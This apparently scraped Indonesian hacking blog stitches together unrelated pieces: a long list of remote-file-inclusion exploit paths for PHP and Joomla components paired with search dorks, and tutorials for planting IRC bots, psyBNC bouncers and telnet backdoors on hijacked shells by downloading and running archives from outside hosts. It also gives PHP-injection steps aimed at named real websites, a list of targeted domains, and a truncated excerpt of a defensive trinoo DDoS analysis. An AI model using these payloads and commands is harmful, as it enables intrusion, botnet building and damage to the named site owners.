sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]= inurl:”sohoadmin”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= inurl:”index.php?pr=Services”
/include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site= “Punktesystem Pro”
ws/login.php?noSet=0&includedir= “WebCalendar”
!scan login.php?svr_rootscript= allinurl:order?page=plan_show
modules/MDForum/includes/functions_admin.php?phpbb_root_path= “powered by MDForum”
/newsboard//admin/addons/archive/archive.php?adminfolder= “/newsboard/”
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “/vwar/”
anguage/lang_german/lang_main_album.php?phpbb_root_path= phpbbplus
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “.uk/index.php”+”option”
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:br
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:il
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= com_frontpage site:my
eva/index.php3?aide= “Eva-Web”
/vwar/convert/mvcw.php?step=1&vwar_root= vwar
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenuXL
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenu”
/photo_comment.php?toroot= �Exhibit Engine 1.5 RC 4″
protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
/accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “netcat require”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
includes/include_once.php?include_file= create_account.php?PHPSESSID=
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “Powered By Zen Cart”
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= Copyright � 2003-2006 Zen Cart
/inc/header.php/step_one.php?server_inc= step_one.php?sid
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_joomap
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_jpgraph
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_letterman
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_swmenufree
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_bsq_sitestats
components/com_livechat/livechat.html.php?mosConfig_absolute_path= com_livechat
components/com_mypms/class.mypms.php?mosConfig_absolute_path= com_mypms
/admin/classes/TplLoad.php?full_path_to_public_program= /TplLoad.php/
/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act= /kboard.php?board=
/index.php?abg_path= Africa Be Gone
errors.php?error= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact=
/LightTwoOh/sidebar.php?loadpage= phpAutoVide
/com_joomnik/admin.joomnik.html.php?mosConfig_absolute_path= com_joomnik
/com_joomlaflashfun/admin.joomlaflashfun.php?= com_joomlaflashfun
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_admin
/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop
/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor
!scan tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
!scan modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= xoopsgallery
!scan /config.inc.php?path_escape= XZero Community Classified
!scan /php121adminconfig.php?mosConfig_absolute_path= PHP121
!scan /common/db.php?commonpath= “samPHPweb”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_rss
path/bridge/yabbse.inc.php?sourcedir= Coppermine Photo Gallery
!scan /lib/functions.php?DOC_ROOT= intitle:”OFFL – Login”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= “/index.php?option=com_joomlaradiov5″
calogic/clmcpreload.php?CLPATH= calogic
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= modules.php?name=
modifyform.html?code= modifyform.html?*=*
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_frontpage
# com_jce # NEW BUG SECURITY PHP 9/15/07 10:05 pm
# com_jim # NEW BUG SECURITY PHP 9/15/07 9:12 pm
# com_jreactions # NEW BUG SECURITY PHP 9/15/07 8:56 pm
# com_neoreferences # NEW BUG SECURITY PHP 9/15/07 8:
# com_quran # NEW BUG SECURITY PHP 9/15/07 7:49 pm
# com_datsogallery # NEW BUG SECURITY PHP 9/15/07 7:47 pm
# com_ricettario # NEW BUG SECURITY PHP 9/15/07 7:38 pm
# com_ab_calendar # NEW BUG SECURITY PHP 9/15/07 7:14 p
# com_joomlalib # NEW BUG SECURITY PHP 9/15/07 6:27 pm
/language/lang_german/lang_main_album.php?phpbb_root_path=
“Powered by phpBB2 Plus”
!scan administrator/components/com_jreactions/langset.php?comPath= Joomla J! Reactions
!scan language/lang_english/lang_main_album.php?phpbb_root_path= phpbb inurl:album.php site:uk
!scan /rconfig.inc.php?config[root_dir]= amember Pro / amember
Solo @rfi /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2 Plus”
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_frontpage
components/com_datsogallery/datsogallery.php?mosConfig_absolute_path= com_frontpage
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_frontpage
mcconfig.php?CLPATH= calogic Philip Boone
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_sobi2
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_acajoom
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= “.tr./components” “.tr./components”
components/com_contxtd/contxtd.class.php?mosConfig_absolute_path= com_contxtd
administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path= components/com_blastchatc/blastchatc.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=
administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path= com_uddeim
components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= com_rwcards
administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path= com_rwcards
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT= “Powered by SocketMail”
modules/Forums/favorites.php?nuke_bb_root_path= Powered by Platinum 7.6.b.5
!scan administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path= com_chronocontact
includes/include_once.php?include_file= Click to View Our Catalog
rconfig.inc.php?config[root_dir]= aMember PRO
index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
/components/com_joomlalib/standalone/stubjambo.php?baseDir= com_performs
!scan /_theme/breadcrumb.php?rootBase= “!new Female Celebrities”
urlinn_includes/config.php?dir_ws= put a copy/past from URL
/_inc/config.php?rootBase= “! Hide Your Friends & Comments”
!scan includes/functions_admin.php?phpbb_root_path= pNphpBB2
tiny_includes/config.php?dir_ws= put a copy/past from URL
/_theme/_siteColors.php?rootBase= ‘page generated in’ time?
!alls index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
!alls index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path= com_joomlaxplorer
com_neolegal | com_dfcontact | com_massmail | com_syndicate |com_categories |com_newsfeeds | com_banners |
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= 2004 Miro International Pty Ltd.
administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path= com_chronocontact
=============================
administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=
administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.php?mosConfig_absolute_path=
administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=
components/com_utchat/utchat.php?mosConfig_absolute_path=
components/com_google_maps/google_maps.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= com_peoplebook
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= webshop
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= CubeCart
/tools/send_reminders.php?includedir= day.php?date=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage
config/config_admin.php?INC= “Your Search Starts Here”
config_member.php?INC= “Your Search Starts Here”
config/config_member.php?INC= “Your Search Starts Here”
membuat bot eggdrop
* 03/04/2009 – 7:33 pm
* Ditulis dalam Tutor
* Tinggalkan sebuah Komentar
Langkah2 membuat Bot Eggdrop:
Sebelumnya anda pastikan dulu ingin di load dimana botnya, disini ada 2 server yg bisa digunakan. Irc.Allnetwork.Org & Irc.Byroe.Net. Setelah itu siapkan Shell dan langsung saja masukan semua comand ini ke dalam shell, tunggu botnya masuk kedalam chan km. Selamat Mencoba
### Irc.Allnetwork.Org ###
1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/jongke_city/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada
8. cd scripts
9. wget geocities.com/jongke_city/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]
### Irc.Byroe.Net ###
1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/script_help/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada
8. cd scripts
9. wget geocities.com/script_help/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]
Thx For ROZI my Owner
INSTAL IRCD
* 01/04/2009 – 8:08 pm
* Ditulis dalam Tutor
* Tinggalkan sebuah Komentar
Anda pasti pernah dengar tentang Ircd? yang identik dengan server & networks. Untuk yang baru pertama kali instal ircd mungkin agak membingungkan dan terkadang sering eror pada bagian akhirnya. Disini akan di jelaskan bagaimana langkah – langkahnya dan bagaimana cara mengatasi masalahnya. Lets Go On Guys… :)
Pertama – tama siapkan shell yang dari linux maupun freeBSD, perbedaanya cuma pemakaian commands`nya. Tentunya banyak yang sudah tau, ya khan? :P
Selanjutnya kita buka shell & buat directoy dahulu untuk menaruh file ircdnya, dan sebelumnya cek dulu dimana posisi directory kita:
pwd
/home/estrada
mkdir solo
nb: solo <= contoh nama directory baru, tempat kita menyimpan file.
Setelah itu kita tinggal masuk ke directory baru kita dan mengexsesekusinya:
1. cd /solo
2. wget http://bdd.exolia.net/serveurs/Unreal3.2.7.tar.gz
3. tar -zxvf Unreal3.2.7.tar.gz
4. cd Unreal3.2.7
5. ./Config
Kalau ada konfirmasi meminta -[ Enter]- Anda tekan Enter aja terus sampai menunjukan 100%.
6. make
Setelah di make anda edit dulu configurasi dari unrealircd.conf, connect.conf, oper.conf, ircd.mtod nya. Untuk Linux gunakan “vi” Sedangkan untuk FreeBSD bisa digunakan “pico” untuk mengedit configurasinya, tergantung support tidaknya. untuk menyimpan file yang telah di edit gunakan comand “Esc + :wq + enter”.
vi unrealircd.conf
vi connect.conf
vi oper.conf
vi ircd.motd
Setelah semua selesai di edit configurasinya exsekusi dengan :
7. make install
8. ./unreal start
Nah selesai sudah, sekarang anda memiliki server sendiri. :P
Cukup sekian dulu penjelasanya, kalau ada yg perlu ditanyakan saran dan kritik akan kami terima dengan lapang dada. :)
NB: Untuk contoh unrealircd.conf, connect.conf, oper.conf anda bisa lihat di kategori IRCD.
Thanks Regard To :
Dj-RuFfy – NOGGLENK – ROZI And Sekip Crew – Cavalera And Habbat Crew.
Irc.Mildnet.Org Crew
Irc.Allindo.Net Crew
Irc.Indoirc.Net Crew
Irc.Byroe.Net Crew
trinoo.analysis
* 01/04/2009 – 6:59 pm
* Ditulis dalam hacking
* Tinggalkan sebuah Komentar
==========================================================================
The DoS Project's "trinoo" distributed denial of service attack tool
==========================================================================
David Dittrich
University of Washington
Copyright 1999. All rights reserved.
October 21, 1999
Introduction
------------
The following is an analysis of the DoS Project's "trinoo" (a.k.a.
"trin00") master/slave programs, which implement a distributed
network denial of service tool.
Trinoo daemons were originally found in binary form on a number of
Solaris 2.x systems, which were identified as having been compromised
by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". These attacks are described in CERT
Incident Note 99-04:
http://www.cert.org/incident_notes/IN-99-04.html
The trinoo daemons were originally believed to be UDP based,
access-restricted remote command shells, possibly used in conjunction
with sniffers to automate recovering sniffer logs.
During investigation of these intrusions, the installation of a trinoo
network was caught in the act and the trinoo source code was obtained
from the account used to cache the intruders' tools and log files.
This analysis was done using this recovered source code.
Modification of the source code would change any of the details
in this analysis, such as prompts, passwords, commands, TCP/UDP port
numbers, or supported attack methods, signatures, and features.
The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
systems. The master was compiled and run on Red Hat Linux 6.0. It is
believed that both master and daemon have been witnessed "in the
wild" on these same platforms.
Trinoo networks are probably being set up on hundreds, perhaps
thousands, of systems on the Internet that are being compromised by
remote buffer overrun exploitation. Access to these systems is
probably being perpetuated by the installation of multiple "back
doors" along with the trinoo daemons.
A trinoo network of at least 227 systems -- 114 of these at Internet2
sites -- was used on August 17, 1999 to flood a single system at the
University of Minnessota, swamping the target network and rendering it
unusable for over two days. While responding to this attack, large
flows were also noticed going to at least sixteen other systems, some
outside the US. (See Appendix D for a report of part of this trinoo
attack.)
Attack scenario
---------------
A typical installation might go something like this.
1). A stolen account is set up as a repository for pre-compiled
versions of scanning tools, attack (i.e. buffer overrun exploit)
tools, root kits and sniffers, trinoo daemon and master programs,
lists of vulnerable hosts and previously compromised hosts, etc. This
would normally be a large system with many users, one with little
administrative oversight, and on a high-bandwidth connection for rapid
file transfer.
2). A scan is performed of large ranges of network blocks to identify
potential targets. Targets would include systems running various
services known to have remotely exploitable buffer overflow security
bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
"ttdbserverd", "amd", etc. Operating systems being targeted appear to
be primarily Sun Solaris 2.x and Linux (due to the ready availability
of network sniffers and "root kits" for concealing back doors, etc.),
but stolen accounts on any architecture can be used for caching tools
and log files.
3). A list of vulnerable systems is then used to create a script that
performs the exploit, sets up a command shell running under the root
account that listens on a TCP port (commonly 1524/tcp, the
"ingreslock" service port), and connects to this port to confirm the
success of the exploit. In some cases, an electronic mail message is
sent to an account at a free web based email service to confirm which
systems have been compromised.
The result is a list of "owned" systems ready for setting up
back doors, sniffers, or the trinoo daemons or masters.
4). From this list of compromised systems, subsets with the desired
architecture are chosen for the trinoo network. Pre-compiled binaries
of the trinoo daemon are created and stored on a stolen account
somewhere on the Internet.
5). A script is then run which takes this list of "owned" systems and
produces yet another script to automate the installation process,
running each installation in the background for maximum multitasking.
This script uses "netcat" ("nc") to pipe a shell script to the root
shell listening on, in this case, port 1524/tcp:
---------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
---------------------------------------------------------------------------
The script "trin.sh", whose output is being piped to these systems,
looks like:
---------------------------------------------------------------------------
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
---------------------------------------------------------------------------
Depending on how closely crontab files are monitored, or if they are
used at all, this may be detected easily. If cron is not used at all
by this user (usually root), it may not be detected at all.
Another method was witnessed on at least one other system, where the
daemon was named "xterm", and was started using a script (named "c" on
the system on which it was found) that contains:
---------------------------------------------------------------------------
cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1>/dev/null 2>&1
---------------------------------------------------------------------------
This would supposedly imply a method of running this script on demand
to set up the trinoo network.
Even more subtle ways of having trinoo daemons/masters lie in wait for
execution at a given time are easy to envision (e.g., UDP or ICMP
based client/server shells, such as LOKI (see Appendix C) , programs
that wake up periodically and open a listening TCP or UDP port, etc.)
The result of this automation is the ability for attackers to set up
the denial of service network, on widely dispersed systems whose true
owners don't even know are out of their control, in a very short time
frame.
6). Optionally, a "root kit" is installed on the system to hide the
presence of programs, files, and network connections. This is more
important on the master system, since these systems are key to the
trinoo network. (It should be noted that in many cases, masters have
been set up on Internet Service Providers' primary name server hosts,
which would normally have extremely high packet traffic and large
numbers of TCP and UDP connections, which would effectively hide any
trinoo related traffic or activity, and would likely not be detected.
(The fact that these are primary name servers would also tend to make
the owners less likely to take the system off the Internet when
reports begin to come in about suspected denial of service related
activity.)
Root kits would also be used on systems running sniffers that, along
with programs like "hunt" (TCP/IP session hijacking tool) are used to
burrow further into other networks directly, rather than through
remote buffer overrun exploits (e.g., to find sites to set up new file
repositories, etc.)
For more on "root kits" and some ways to get around them, see:
http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
------------------------------------------------------------
The trinoo network is made up of a master server ("master.c") and the
trinoo daemon ("ns.c"). A trinoo network would look like this:
+----------+ +----------+
| attacker | | attacker |
+----------+ +----------+
| |
. . . --+------+---------------+------+----------------+-- . . .
| | |
| | |
+----------+ +----------+ +----------+
| master | | master | | master |
+----------+ +----------+ +----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
| | | | |
| | | | |
+--------+ +--------+ +--------+ +--------+ +--------+
| daemon | | daemon | | daemon | | daemon | | daemon |
+--------+ +--------+ +--------+ +--------+ +--------+
The attacker(s) control one or more "master" servers, each of which
can control many "daemons" (known in the code as "Bcast", or
"broadcast" hosts.) The daemons are all instructed to coordinate a
packet based attack against one or more victim systems.
All that is then needed is the ability to establish a TCP connection
to the master hosts using "telnet" and the password to the master
server to be able to wage massive, coordinated, denial of service
attacks.
Communication ports
-------------------
Attacker to Master(s): 27665/tcp
Master to daemon(s): 27444/udp
Daemon to Master(s): 31335/udp
Remote control of the trinoo master is accomplished via a TCP
connection to port 27665/tcp. After connecting, the user must give
the proper password ("betaalmostdone"). If
Rabu, 15 Juli 2009
http://revoblogs-belajarbisnis.blogspot.com
kalian udah ga naeh kan chat di mirc...:D
kini saya mau kasih sedikit informasi dan ilmu kepada kalian, saya bukan nya ingin pamer tp saya hanya ingin membagi ilmu kepada kalian smw....
berikut ini tutorial cara menbuat psybnc dan boot :
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server
cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf
cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt
cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run
ada juga cara yang lebih mudah injek php tutorial nya :
*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid
extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll
Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30
*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?
Sehingga target tersebut berubah menjadi:
http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.
Commands Yang Digunakan Di PHP Injection
========================================
*. Check Server
uname -a;id;uptime;wget;/sbin/ifconfig|grep inet
*. Bot dengan Netgate.tcl Untuk Allnetwork
cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]
*. Bot dengan RemajaBot di Allnet
cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
find / -type d -perm 777
*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl
cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl
disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt
cd /dev/shm/bete;./eggdrop -m vian.txt
*.Membuat psyBNC port 31310
cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc
*.Membuat psyBNC dengan port dan ident tertentu
cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run
* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz
* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf
* Liat IP /sbin/ifconfig
*.BackDoor Session
++ telnet:1979
wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run
++ telnet 1666
cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin
++ linux shv4
cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)
COMMANDS CADANGAN
==================
*. Jika wget tidak berfungsi
gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz
*. Jika Dir tmp Tidak dapat Digunakan
gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm
*. Mencari Dir yang terbuka
gunakan find / -type d -perm 777
cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov
=====ala cempe ====
cari: ./phplivehelper/blank.php
./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?
mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
===========
cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc
-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
